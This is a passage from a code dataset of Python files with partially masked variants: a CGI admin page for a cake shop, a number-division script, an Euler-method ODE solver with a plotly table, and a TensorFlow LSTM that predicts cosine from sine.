value=\"Add\">\n\t\t\t\t</div>\n\t\t\t\t<div class=\"col-sm-12 footer\">\n\t\t\t\t<div class=\"col-sm-6\">©copyright:<a target=\"_blank\" href=\"https://www.techpile.in\">Techpile Technology.pvt.Ltd.</a>\n\t\t\t\t</div>\n\t\t\t\t\n\t\t\t\t<div class=\"col-sm-6\">\t\n Developed By:-Yash Rastogi</div>\n\t\t\t\t</div>\n\t\t\t\t\n\t\t\t</div>\n\t\t\t</div>\n\n\n</body>\n</html>\n\n\"\"\"\n )\n",
"step-3": "#!C:\\Python27\\python\r\nprint('Content-Type:text/html\\n\\n')\r\nprint (\"\"\"\r\n<html>\r\n<head>\r\n<link href=\"iconTech.png\" rel=\"icon\"/>\r\n<meta name=\"viewport\" content=\"width=device-width,intial-scale=1.0\"/>\r\n<link href=\"../css/bootstrap.min.css\" rel=\"stylesheet\" type=\"text/css\"/>\r\n<link href=\"../css/bootstrap-theme.min.css\" rel=\"stylesheet\" type=\"text/css\"/>\r\n<link rel=\"stylesheet\" href=\"../css/font-awesome.min.css\" type=\"text/css\"/>\r\n<script src=\"../js/jquery.js\"></script>\r\n<script src=\"../js/bootstrap.min.js\"></script>\r\n<style>\r\n.outer\r\n{\r\nmin-height:100px;\r\n}\r\n.top\r\n{\r\n min-height:50px;\r\n background:gray;\r\n}\r\n.logo\r\n{\r\n height:50px;\r\n width:240px;\r\n margin:5px 5px;\r\n background:white;\r\n font-size:30px;\r\n font-family:Algerian;\r\n border:5px double green;\r\n}\r\n.menu\r\n{\r\n height:50px;\r\n width:1000px;\r\n background:gray;\r\n z-index:10;\r\n}\r\n#menu\r\n{\r\n background:none;\r\n border:none;\r\n box-shadow:none;\r\n padding:1% 0%;\r\n margin:0px;\r\n font-size:15px;\r\n}\r\n#menu ul li a\r\n{\r\n color:white;\r\n text-shadow:none;\r\n font-weight:bold;\r\n font-size:12px;\r\n}\r\n#menu ul li:hover\r\n{\r\n background:transparent; \r\n}\r\n.head\r\n{\r\n height:100px;\r\n background:url('../bimg/d1.jpg');\r\n background-attachment:fixed;\r\n background-size:100% 100%;\r\n}\r\n.head1\r\n{\r\n height:100px;\r\n background-color:rgba(0,0,0,.4);\r\n color:white;\r\n font-size:20px;\r\n padding:2% 0%;\r\n}\r\n.addcake\r\n{\r\nmin-height:550px;\r\nmargin-left:25%;\r\nbackground:rgba(0,0,0,.3);\r\nmargin-top:20px;\r\nmargin-bottom:20px;\r\n}\r\n\r\n.footer\r\n{\r\n min-height:50px;\r\n padding:1% 0%;\r\n text-align:center;\r\n color:white;\r\n font-size:20px;\r\n background:black;\r\n}\r\n</style>\r\n</head>\r\n<body>\r\n<div class=\"col-sm-12 outer\">\r\n\t\t\t<div class=\"row\">\r\n\t\t\t\t<div class=\"col-sm-12 top\">\r\n\t\t\t\t<div class=\"row\">\r\n\t\t\t\t\t<div class=\"col-sm-3 logo\">Bake<span style=\"color:orange;\">-o-</span>logy</div>\r\n\t\t\t\t\t<div class=\"col-sm-9 menu\">\t\t\t\t\t<nav class=\"navbar navbar-default\" id=\"menu\">\r\n <div class=\"container-fluid\">\r\n <!-- Brand and toggle get grouped for better mobile display -->\r\n <div class=\"navbar-header\">\r\n <button type=\"button\" class=\"navbar-toggle collapsed\" data-toggle=\"collapse\" data-target=\"#bs-example-navbar-collapse-1\" aria-expanded=\"false\">\r\n <span class=\"sr-only clpbtn\">Toggle navigation</span>\r\n <span class=\"icon-bar\"></span>\r\n <span class=\"icon-bar\"></span>\r\n <span class=\"icon-bar\"></span>\r\n </button>\r\n </div>\r\n<!-- Collect the nav links, forms, and other content for toggling -->\r\n <div class=\"collapse navbar-collapse\" id=\"bs-example-navbar-collapse-1\" >\r\n <ul class=\"nav navbar-nav navbar-right\">\r\n <li><a href=\"index.py\">Dashboard</a></li>\r\n <li><a href=\"Addmenu.py\">Add Menu</a></li>\r\n\t\t<li><a href=\"Addservices.py\">Add Services</a></li>\r\n\t\t<li><a href=\"Addimages.py\">Add Images</a></li>\r\n\t\t<li><a href=\"OrderManagement.py\">Order Management</a></li>\r\n\t\t<li><a href=\"ContactManagement.py\">Contact Management</a></li>\r\n\t\t<li><a href=\"Changepassword.py\">Change Password</a></li>\r\n\t\t<li><a href=\"LogOut.py\">LogOut</a></li>\r\n\t\t</li>\r\n \r\n\t\t </ul>\r\n\t\t\t \r\n </div><!-- /.navbar-collapse -->\r\n </div><!-- /.container-fluid -->\r\n</nav>\r\n \t\t\t\t\t\r\n\t\t </div></div></div>\r\n\t\t\t\t<div class=\"col-sm-12 
main\">\r\n\t\t\t\t<div class=\"row\">\r\n\t\t\t\t<div class=\"col-sm-12 head\">\r\n\t\t\t\t<div class=\"row\">\r\n\t\t\t\t<div class=\"col-sm-12 head1\">\r\n\t\t\t\t<div class=\"text-center\"><span class=\"fa fa-cutlery \"></span> Add Cake Menu </div>\r\n\t\t\t\t</div>\r\n\t\t\t\t</div></div>\r\n\t\t\t\t</div></div>\r\n\t\t\t\t<div class=\"col-sm-6 addcake\">\r\n\t\t\t\t<div class=\"h2 text-center\">Add Cakes Menu</div>\r\n\t\t\t\t<form action=\"../code/cakecode.py\" enctype=\"multipart/form-data\" method=\"post\">\r\n\t\t\t\t<div class=\"h4\">Cake Name</div>\r\n\t\t\t\t<input type=\"text\" placeholder=\"Input Your Cake Name\" name=\"cake\" class=\"form-control\">\r\n\t\t\t\t<div class=\"h4\">Cake Size</div>\r\n\t\t\t\t<input type=\"text\" placeholder=\"Input Your Cake size\" name=\"size\" class=\"form-control\">\r\n <div class=\"h4\">Cake Weight</div>\r\n\t\t\t\t<input type=\"text\" placeholder=\"Input Your Cake Flavour\" name=\"flavour\" class=\"form-control\">\r\n <div class=\"h4\">Price</div>\r\n\t\t\t\t <input type=\"text\" placeholder=\"Input Your Cake Weight\" name=\"weight\" class=\"form-control\">\r\n <div class=\"h4\">Cake Flavour</div>\r\n\t\t\t\t<input type=\"text\" placeholder=\"Input Your Cake Price\" name=\"price\" class=\"form-control\">\t\r\n <div class=\"h4\">Cake Image</div>\r\n\t\t\t\t<input type=\"file\" placeholder=\"Import Your Cake image\" name=\"pic\" class=\"form-control\"><br/>\r\n <input type=\"submit\" class=\"form-control\" value=\"Add\">\r\n\t\t\t\t</div>\r\n\t\t\t\t<div class=\"col-sm-12 footer\">\r\n\t\t\t\t<div class=\"col-sm-6\">©copyright:<a target=\"_blank\" href=\"https://www.techpile.in\">Techpile Technology.pvt.Ltd.</a>\r\n\t\t\t\t</div>\r\n\t\t\t\t\r\n\t\t\t\t<div class=\"col-sm-6\">\t\r\n Developed By:-Yash Rastogi</div>\r\n\t\t\t\t</div>\r\n\t\t\t\t\r\n\t\t\t</div>\r\n\t\t\t</div>\r\n\r\n\r\n</body>\r\n</html>\r\n\r\n\"\"\")",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#!/usr/local/bin/python
i = 0
while i == 0:
try:
print("Let's divide some numbers!")
a1 = input("Enter numerator: ")
b1 = input("Enter denominator: ")
a = int(a1)
b = int(b1)
print(a1 + " divied by " + b1 + " equals: " + str(a/b))
i += 1
except ZeroDivisionError:
print("Cannot divide by 0")
except ValueError:
print("Invalid input, not a number")
|
normal
|
{
"blob_id": "dcc1b0decf2fca6309dbb60faebd3f0a6944cd7d",
"index": 9130,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile i == 0:\n try:\n print(\"Let's divide some numbers!\")\n a1 = input('Enter numerator: ')\n b1 = input('Enter denominator: ')\n a = int(a1)\n b = int(b1)\n print(a1 + ' divied by ' + b1 + ' equals: ' + str(a / b))\n i += 1\n except ZeroDivisionError:\n print('Cannot divide by 0')\n except ValueError:\n print('Invalid input, not a number')\n",
"step-3": "i = 0\nwhile i == 0:\n try:\n print(\"Let's divide some numbers!\")\n a1 = input('Enter numerator: ')\n b1 = input('Enter denominator: ')\n a = int(a1)\n b = int(b1)\n print(a1 + ' divied by ' + b1 + ' equals: ' + str(a / b))\n i += 1\n except ZeroDivisionError:\n print('Cannot divide by 0')\n except ValueError:\n print('Invalid input, not a number')\n",
"step-4": "#!/usr/local/bin/python\n\ni = 0\nwhile i == 0:\n\n try:\n print(\"Let's divide some numbers!\")\n a1 = input(\"Enter numerator: \")\n b1 = input(\"Enter denominator: \")\n a = int(a1)\n b = int(b1)\n \n print(a1 + \" divied by \" + b1 + \" equals: \" + str(a/b))\n i += 1\n \n except ZeroDivisionError:\n print(\"Cannot divide by 0\")\n except ValueError:\n print(\"Invalid input, not a number\")\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from math import pow
from math import tan
import plotly.figure_factory as ff
from plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot
def euler():
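    # explicit Euler method for y' = (x + y)^2 with y(0) = 0, compared against the exact solution y = tan(x) - x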
h = 0.1
x = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5]
y_eval = [0.0]
delta_y = [0.0]
y_real = [0.0]
eps = [0.0]
for i in range(1, len(x)):
y_eval.append(y_eval[i - 1] + h * fun(x[i - 1], y_eval[i - 1]))
        delta_y.append(h * fun(x[i], y_eval[i]))
y_real.append(real_fun(x[i]))
eps.append(abs(y_real[i] - y_eval[i]))
# print in table format
print(y_eval)
print(delta_y)
print(y_real)
print(eps)
data_matrix = [
['k', 'x', 'y', 'delta_y', 'y_real', 'eps']
]
for i in range(0, len(x)):
data_matrix.append([i, x[i], y_eval[i], delta_y[i], y_real[i], eps[i]])
table = ff.create_table(data_matrix)
plot(table)
def fun(x, y):
return pow(x + y, 2)
def real_fun(x):
return tan(x) - x
euler()
|
normal
|
{
"blob_id": "20f0480ee7e0782b23ec8ade150cdd8d8ad718bb",
"index": 783,
"step-1": "<mask token>\n\n\ndef euler():\n h = 0.1\n x = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5]\n y_eval = [0.0]\n delta_y = [0.0]\n y_real = [0.0]\n eps = [0.0]\n for i in range(1, len(x)):\n y_eval.append(y_eval[i - 1] + h * fun(x[i - 1], y_eval[i - 1]))\n delta_y.append(h * fun(y_eval[i], x[i]))\n y_real.append(real_fun(x[i]))\n eps.append(abs(y_real[i] - y_eval[i]))\n print(y_eval)\n print(delta_y)\n print(y_real)\n print(eps)\n data_matrix = [['k', 'x', 'y', 'delta_y', 'y_real', 'eps']]\n for i in range(0, len(x)):\n data_matrix.append([i, x[i], y_eval[i], delta_y[i], y_real[i], eps[i]])\n table = ff.create_table(data_matrix)\n plot(table)\n\n\ndef fun(x, y):\n return pow(x + y, 2)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef euler():\n h = 0.1\n x = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5]\n y_eval = [0.0]\n delta_y = [0.0]\n y_real = [0.0]\n eps = [0.0]\n for i in range(1, len(x)):\n y_eval.append(y_eval[i - 1] + h * fun(x[i - 1], y_eval[i - 1]))\n delta_y.append(h * fun(y_eval[i], x[i]))\n y_real.append(real_fun(x[i]))\n eps.append(abs(y_real[i] - y_eval[i]))\n print(y_eval)\n print(delta_y)\n print(y_real)\n print(eps)\n data_matrix = [['k', 'x', 'y', 'delta_y', 'y_real', 'eps']]\n for i in range(0, len(x)):\n data_matrix.append([i, x[i], y_eval[i], delta_y[i], y_real[i], eps[i]])\n table = ff.create_table(data_matrix)\n plot(table)\n\n\ndef fun(x, y):\n return pow(x + y, 2)\n\n\ndef real_fun(x):\n return tan(x) - x\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef euler():\n h = 0.1\n x = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5]\n y_eval = [0.0]\n delta_y = [0.0]\n y_real = [0.0]\n eps = [0.0]\n for i in range(1, len(x)):\n y_eval.append(y_eval[i - 1] + h * fun(x[i - 1], y_eval[i - 1]))\n delta_y.append(h * fun(y_eval[i], x[i]))\n y_real.append(real_fun(x[i]))\n eps.append(abs(y_real[i] - y_eval[i]))\n print(y_eval)\n print(delta_y)\n print(y_real)\n print(eps)\n data_matrix = [['k', 'x', 'y', 'delta_y', 'y_real', 'eps']]\n for i in range(0, len(x)):\n data_matrix.append([i, x[i], y_eval[i], delta_y[i], y_real[i], eps[i]])\n table = ff.create_table(data_matrix)\n plot(table)\n\n\ndef fun(x, y):\n return pow(x + y, 2)\n\n\ndef real_fun(x):\n return tan(x) - x\n\n\neuler()\n",
"step-4": "from math import pow\nfrom math import tan\nimport plotly.figure_factory as ff\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\n\n\ndef euler():\n h = 0.1\n x = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5]\n y_eval = [0.0]\n delta_y = [0.0]\n y_real = [0.0]\n eps = [0.0]\n for i in range(1, len(x)):\n y_eval.append(y_eval[i - 1] + h * fun(x[i - 1], y_eval[i - 1]))\n delta_y.append(h * fun(y_eval[i], x[i]))\n y_real.append(real_fun(x[i]))\n eps.append(abs(y_real[i] - y_eval[i]))\n print(y_eval)\n print(delta_y)\n print(y_real)\n print(eps)\n data_matrix = [['k', 'x', 'y', 'delta_y', 'y_real', 'eps']]\n for i in range(0, len(x)):\n data_matrix.append([i, x[i], y_eval[i], delta_y[i], y_real[i], eps[i]])\n table = ff.create_table(data_matrix)\n plot(table)\n\n\ndef fun(x, y):\n return pow(x + y, 2)\n\n\ndef real_fun(x):\n return tan(x) - x\n\n\neuler()\n",
"step-5": "from math import pow\nfrom math import tan\n\nimport plotly.figure_factory as ff\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\n\ndef euler():\n h = 0.1\n x = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5]\n y_eval = [0.0]\n delta_y = [0.0]\n y_real = [0.0]\n eps = [0.0]\n\n for i in range(1, len(x)):\n y_eval.append(y_eval[i - 1] + h * fun(x[i - 1], y_eval[i - 1]))\n delta_y.append(h * fun(y_eval[i], x[i]))\n y_real.append(real_fun(x[i]))\n eps.append(abs(y_real[i] - y_eval[i]))\n\n # print in table format\n print(y_eval)\n print(delta_y)\n print(y_real)\n print(eps)\n\n data_matrix = [\n ['k', 'x', 'y', 'delta_y', 'y_real', 'eps']\n ]\n for i in range(0, len(x)):\n data_matrix.append([i, x[i], y_eval[i], delta_y[i], y_real[i], eps[i]])\n\n table = ff.create_table(data_matrix)\n plot(table)\n\n\ndef fun(x, y):\n return pow(x + y, 2)\n\n\ndef real_fun(x):\n return tan(x) - x\n\n\neuler()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
BATCH_START=0
TIME_STEPS=20
BATCH_SIZE=50
INPUT_SIZE=1
OUTPUT_SIZE=1
CELL_SIZE=10
LR=0.006
#generate data
def get_batch():
global BATCH_START,TIME_STEPS
xs=np.arange(BATCH_START,BATCH_START+TIME_STEPS*BATCH_SIZE).reshape((BATCH_SIZE,TIME_STEPS))/(10*np.pi)
seq=np.sin(xs)
res=np.cos(xs)
#data move one
BATCH_START+=TIME_STEPS
# all return shape is (batch_size,time_step,input_size)
return [seq[:,:,np.newaxis],res[:,:,np.newaxis],xs]
#def RNN LSTM Structure
class LSTMRNN(object):
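    # input projection -> LSTM cell -> output projection, trained with Adam on a squared-error sequence loss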
def __init__(self,n_steps,input_size,output_size,cell_size,batch_size):
self.n_steps=n_steps
self.input_size=input_size
self.output_size=output_size
self.cell_size=cell_size
self.batch_size=batch_size
with tf.name_scope('inputs'):
self.xs=tf.placeholder(tf.float32,[None,n_steps,input_size],name='xs')
self.ys=tf.placeholder(tf.float32,[None,n_steps,input_size],name='ys')
with tf.variable_scope('in_hidden'):
self.add_input_layer()
with tf.variable_scope('LSTM_cell'):
self.add_cell()
with tf.variable_scope('out_hidden'):
self.add_output_layer()
with tf.name_scope('cost'):
self.compute_cost()
with tf.name_scope('train'):
self.train_op=tf.train.AdamOptimizer(LR).minimize(self.cost)
#add input layer
def add_input_layer(self):
#shape(batch,step,input)=>(batch*step,input)
l_in_x=tf.reshape(self.xs,[-1,self.input_size],name='2_2D')
Ws_in=self._weight_variable([self.input_size,self.cell_size])
bs_in=self._bias_variable([self.cell_size])
with tf.name_scope('Wx_plus_b'):
l_in_y=tf.matmul(l_in_x,Ws_in)+bs_in
self.l_in_y=tf.reshape(l_in_y,[-1,self.n_steps,self.cell_size],name='2_3D')
#add cell
def add_cell(self):
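        # one BasicLSTMCell unrolled with dynamic_rnn; the final state is kept so it can seed the next batch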
lstm_cell=tf.contrib.rnn.BasicLSTMCell(self.cell_size,forget_bias=1.0,state_is_tuple=True)
with tf.name_scope('initial_state'):
self.cell_init_state=lstm_cell.zero_state(self.batch_size,dtype=tf.float32)
self.cell_outputs,self.cell_final_state=tf.nn.dynamic_rnn(lstm_cell,self.l_in_y,initial_state=self.cell_init_state,time_major=False)
#add output layer
def add_output_layer(self):
l_out_x=tf.reshape(self.cell_outputs,[-1,self.cell_size],name='2_2D')
Ws_out=self._weight_variable([self.cell_size,self.output_size])
bs_out=self._bias_variable([self.output_size,])
with tf.name_scope('Wx_plus_b'):
self.pred=tf.matmul(l_out_x,Ws_out)+bs_out
def compute_cost(self):
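        # per-timestep squared error averaged across time, then averaged over the batch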
losses=tf.contrib.legacy_seq2seq.sequence_loss_by_example(
[tf.reshape(self.pred,[-1],name='reshape_pred')],
[tf.reshape(self.ys,[-1],name='reshape_target')],
[tf.ones([self.batch_size*self.n_steps],dtype=tf.float32)],
average_across_timesteps=True,
softmax_loss_function=self.ms_error,
name='losses'
)
with tf.name_scope('average_cost'):
self.cost=tf.div(
tf.reduce_sum(losses,name='losses_sum'),
self.batch_size,
name='average_cost'
)
tf.summary.scalar('cost',self.cost)
@staticmethod
def ms_error(labels,logits):
return tf.square(tf.subtract(labels,logits))
def _weight_variable(self,shape,name='weights'):
initializer=tf.random_normal_initializer(mean=0.,stddev=1.,)
return tf.get_variable(shape=shape,initializer=initializer,name=name)
def _bias_variable(self,shape,name='biases'):
initializer=tf.constant_initializer(0.1)
return tf.get_variable(shape=shape,initializer=initializer,name=name)
#train
if __name__=='__main__':
model=LSTMRNN(TIME_STEPS,INPUT_SIZE,OUTPUT_SIZE,CELL_SIZE,BATCH_SIZE)
sess=tf.Session()
#merge for tensorboard
merged=tf.summary.merge_all()
writer=tf.summary.FileWriter("lstmlogs",sess.graph)
sess.run(tf.global_variables_initializer())
#visiable
plt.ion()
plt.show()
#train for 200
for i in range(200):
seq,res,xs=get_batch()
if i==0:
feed_dict={model.xs:seq,model.ys:res,}
else:
feed_dict={model.xs:seq,model.ys:res,model.cell_init_state:state}
#train
_,cost,state,pred=sess.run([model.train_op,model.cost,model.cell_final_state,model.pred],feed_dict=feed_dict)
#plotting
plt.plot(xs[0,:],res[0].flatten(),'r',xs[0,:],pred.flatten()[:TIME_STEPS],'b--')
plt.ylim((-1.2,1.2))
plt.draw()
plt.pause(0.3)
if i%20==0:
            # print the training cost rounded to 4 decimal places
print('cost',round(cost,4))
result=sess.run(merged,feed_dict)
writer.add_summary(result,i)
|
normal
|
{
"blob_id": "e54078f21176bbb7accb4164e7b56633b13cc693",
"index": 8803,
"step-1": "<mask token>\n\n\nclass LSTMRNN(object):\n\n def __init__(self, n_steps, input_size, output_size, cell_size, batch_size\n ):\n self.n_steps = n_steps\n self.input_size = input_size\n self.output_size = output_size\n self.cell_size = cell_size\n self.batch_size = batch_size\n with tf.name_scope('inputs'):\n self.xs = tf.placeholder(tf.float32, [None, n_steps, input_size\n ], name='xs')\n self.ys = tf.placeholder(tf.float32, [None, n_steps, input_size\n ], name='ys')\n with tf.variable_scope('in_hidden'):\n self.add_input_layer()\n with tf.variable_scope('LSTM_cell'):\n self.add_cell()\n with tf.variable_scope('out_hidden'):\n self.add_output_layer()\n with tf.name_scope('cost'):\n self.compute_cost()\n with tf.name_scope('train'):\n self.train_op = tf.train.AdamOptimizer(LR).minimize(self.cost)\n <mask token>\n\n def add_cell(self):\n lstm_cell = tf.contrib.rnn.BasicLSTMCell(self.cell_size,\n forget_bias=1.0, state_is_tuple=True)\n with tf.name_scope('initial_state'):\n self.cell_init_state = lstm_cell.zero_state(self.batch_size,\n dtype=tf.float32)\n self.cell_outputs, self.cell_final_state = tf.nn.dynamic_rnn(lstm_cell,\n self.l_in_y, initial_state=self.cell_init_state, time_major=False)\n\n def add_output_layer(self):\n l_out_x = tf.reshape(self.cell_outputs, [-1, self.cell_size], name=\n '2_2D')\n Ws_out = self._weight_variable([self.cell_size, self.output_size])\n bs_out = self._bias_variable([self.output_size])\n with tf.name_scope('Wx_plus_b'):\n self.pred = tf.matmul(l_out_x, Ws_out) + bs_out\n\n def compute_cost(self):\n losses = tf.contrib.legacy_seq2seq.sequence_loss_by_example([tf.\n reshape(self.pred, [-1], name='reshape_pred')], [tf.reshape(\n self.ys, [-1], name='reshape_target')], [tf.ones([self.\n batch_size * self.n_steps], dtype=tf.float32)],\n average_across_timesteps=True, softmax_loss_function=self.\n ms_error, name='losses')\n with tf.name_scope('average_cost'):\n self.cost = tf.div(tf.reduce_sum(losses, name='losses_sum'),\n self.batch_size, name='average_cost')\n tf.summary.scalar('cost', self.cost)\n\n @staticmethod\n def ms_error(labels, logits):\n return tf.square(tf.subtract(labels, logits))\n\n def _weight_variable(self, shape, name='weights'):\n initializer = tf.random_normal_initializer(mean=0.0, stddev=1.0)\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n def _bias_variable(self, shape, name='biases'):\n initializer = tf.constant_initializer(0.1)\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_batch():\n global BATCH_START, TIME_STEPS\n xs = np.arange(BATCH_START, BATCH_START + TIME_STEPS * BATCH_SIZE).reshape(\n (BATCH_SIZE, TIME_STEPS)) / (10 * np.pi)\n seq = np.sin(xs)\n res = np.cos(xs)\n BATCH_START += TIME_STEPS\n return [seq[:, :, np.newaxis], res[:, :, np.newaxis], xs]\n\n\nclass LSTMRNN(object):\n\n def __init__(self, n_steps, input_size, output_size, cell_size, batch_size\n ):\n self.n_steps = n_steps\n self.input_size = input_size\n self.output_size = output_size\n self.cell_size = cell_size\n self.batch_size = batch_size\n with tf.name_scope('inputs'):\n self.xs = tf.placeholder(tf.float32, [None, n_steps, input_size\n ], name='xs')\n self.ys = tf.placeholder(tf.float32, [None, n_steps, input_size\n ], name='ys')\n with tf.variable_scope('in_hidden'):\n self.add_input_layer()\n with tf.variable_scope('LSTM_cell'):\n self.add_cell()\n with tf.variable_scope('out_hidden'):\n self.add_output_layer()\n with tf.name_scope('cost'):\n self.compute_cost()\n with tf.name_scope('train'):\n self.train_op = tf.train.AdamOptimizer(LR).minimize(self.cost)\n\n def add_input_layer(self):\n l_in_x = tf.reshape(self.xs, [-1, self.input_size], name='2_2D')\n Ws_in = self._weight_variable([self.input_size, self.cell_size])\n bs_in = self._bias_variable([self.cell_size])\n with tf.name_scope('Wx_plus_b'):\n l_in_y = tf.matmul(l_in_x, Ws_in) + bs_in\n self.l_in_y = tf.reshape(l_in_y, [-1, self.n_steps, self.cell_size],\n name='2_3D')\n\n def add_cell(self):\n lstm_cell = tf.contrib.rnn.BasicLSTMCell(self.cell_size,\n forget_bias=1.0, state_is_tuple=True)\n with tf.name_scope('initial_state'):\n self.cell_init_state = lstm_cell.zero_state(self.batch_size,\n dtype=tf.float32)\n self.cell_outputs, self.cell_final_state = tf.nn.dynamic_rnn(lstm_cell,\n self.l_in_y, initial_state=self.cell_init_state, time_major=False)\n\n def add_output_layer(self):\n l_out_x = tf.reshape(self.cell_outputs, [-1, self.cell_size], name=\n '2_2D')\n Ws_out = self._weight_variable([self.cell_size, self.output_size])\n bs_out = self._bias_variable([self.output_size])\n with tf.name_scope('Wx_plus_b'):\n self.pred = tf.matmul(l_out_x, Ws_out) + bs_out\n\n def compute_cost(self):\n losses = tf.contrib.legacy_seq2seq.sequence_loss_by_example([tf.\n reshape(self.pred, [-1], name='reshape_pred')], [tf.reshape(\n self.ys, [-1], name='reshape_target')], [tf.ones([self.\n batch_size * self.n_steps], dtype=tf.float32)],\n average_across_timesteps=True, softmax_loss_function=self.\n ms_error, name='losses')\n with tf.name_scope('average_cost'):\n self.cost = tf.div(tf.reduce_sum(losses, name='losses_sum'),\n self.batch_size, name='average_cost')\n tf.summary.scalar('cost', self.cost)\n\n @staticmethod\n def ms_error(labels, logits):\n return tf.square(tf.subtract(labels, logits))\n\n def _weight_variable(self, shape, name='weights'):\n initializer = tf.random_normal_initializer(mean=0.0, stddev=1.0)\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n def _bias_variable(self, shape, name='biases'):\n initializer = tf.constant_initializer(0.1)\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n\nif __name__ == '__main__':\n model = LSTMRNN(TIME_STEPS, INPUT_SIZE, OUTPUT_SIZE, CELL_SIZE, BATCH_SIZE)\n sess = tf.Session()\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter('lstmlogs', sess.graph)\n sess.run(tf.global_variables_initializer())\n plt.ion()\n plt.show()\n for i in range(200):\n seq, res, xs = get_batch()\n if i 
== 0:\n feed_dict = {model.xs: seq, model.ys: res}\n else:\n feed_dict = {model.xs: seq, model.ys: res, model.\n cell_init_state: state}\n _, cost, state, pred = sess.run([model.train_op, model.cost, model.\n cell_final_state, model.pred], feed_dict=feed_dict)\n plt.plot(xs[0, :], res[0].flatten(), 'r', xs[0, :], pred.flatten()[\n :TIME_STEPS], 'b--')\n plt.ylim((-1.2, 1.2))\n plt.draw()\n plt.pause(0.3)\n if i % 20 == 0:\n print('cost', round(cost, 4))\n result = sess.run(merged, feed_dict)\n writer.add_summary(result, i)\n",
"step-3": "<mask token>\nBATCH_START = 0\nTIME_STEPS = 20\nBATCH_SIZE = 50\nINPUT_SIZE = 1\nOUTPUT_SIZE = 1\nCELL_SIZE = 10\nLR = 0.006\n\n\ndef get_batch():\n global BATCH_START, TIME_STEPS\n xs = np.arange(BATCH_START, BATCH_START + TIME_STEPS * BATCH_SIZE).reshape(\n (BATCH_SIZE, TIME_STEPS)) / (10 * np.pi)\n seq = np.sin(xs)\n res = np.cos(xs)\n BATCH_START += TIME_STEPS\n return [seq[:, :, np.newaxis], res[:, :, np.newaxis], xs]\n\n\nclass LSTMRNN(object):\n\n def __init__(self, n_steps, input_size, output_size, cell_size, batch_size\n ):\n self.n_steps = n_steps\n self.input_size = input_size\n self.output_size = output_size\n self.cell_size = cell_size\n self.batch_size = batch_size\n with tf.name_scope('inputs'):\n self.xs = tf.placeholder(tf.float32, [None, n_steps, input_size\n ], name='xs')\n self.ys = tf.placeholder(tf.float32, [None, n_steps, input_size\n ], name='ys')\n with tf.variable_scope('in_hidden'):\n self.add_input_layer()\n with tf.variable_scope('LSTM_cell'):\n self.add_cell()\n with tf.variable_scope('out_hidden'):\n self.add_output_layer()\n with tf.name_scope('cost'):\n self.compute_cost()\n with tf.name_scope('train'):\n self.train_op = tf.train.AdamOptimizer(LR).minimize(self.cost)\n\n def add_input_layer(self):\n l_in_x = tf.reshape(self.xs, [-1, self.input_size], name='2_2D')\n Ws_in = self._weight_variable([self.input_size, self.cell_size])\n bs_in = self._bias_variable([self.cell_size])\n with tf.name_scope('Wx_plus_b'):\n l_in_y = tf.matmul(l_in_x, Ws_in) + bs_in\n self.l_in_y = tf.reshape(l_in_y, [-1, self.n_steps, self.cell_size],\n name='2_3D')\n\n def add_cell(self):\n lstm_cell = tf.contrib.rnn.BasicLSTMCell(self.cell_size,\n forget_bias=1.0, state_is_tuple=True)\n with tf.name_scope('initial_state'):\n self.cell_init_state = lstm_cell.zero_state(self.batch_size,\n dtype=tf.float32)\n self.cell_outputs, self.cell_final_state = tf.nn.dynamic_rnn(lstm_cell,\n self.l_in_y, initial_state=self.cell_init_state, time_major=False)\n\n def add_output_layer(self):\n l_out_x = tf.reshape(self.cell_outputs, [-1, self.cell_size], name=\n '2_2D')\n Ws_out = self._weight_variable([self.cell_size, self.output_size])\n bs_out = self._bias_variable([self.output_size])\n with tf.name_scope('Wx_plus_b'):\n self.pred = tf.matmul(l_out_x, Ws_out) + bs_out\n\n def compute_cost(self):\n losses = tf.contrib.legacy_seq2seq.sequence_loss_by_example([tf.\n reshape(self.pred, [-1], name='reshape_pred')], [tf.reshape(\n self.ys, [-1], name='reshape_target')], [tf.ones([self.\n batch_size * self.n_steps], dtype=tf.float32)],\n average_across_timesteps=True, softmax_loss_function=self.\n ms_error, name='losses')\n with tf.name_scope('average_cost'):\n self.cost = tf.div(tf.reduce_sum(losses, name='losses_sum'),\n self.batch_size, name='average_cost')\n tf.summary.scalar('cost', self.cost)\n\n @staticmethod\n def ms_error(labels, logits):\n return tf.square(tf.subtract(labels, logits))\n\n def _weight_variable(self, shape, name='weights'):\n initializer = tf.random_normal_initializer(mean=0.0, stddev=1.0)\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n def _bias_variable(self, shape, name='biases'):\n initializer = tf.constant_initializer(0.1)\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n\nif __name__ == '__main__':\n model = LSTMRNN(TIME_STEPS, INPUT_SIZE, OUTPUT_SIZE, CELL_SIZE, BATCH_SIZE)\n sess = tf.Session()\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter('lstmlogs', sess.graph)\n 
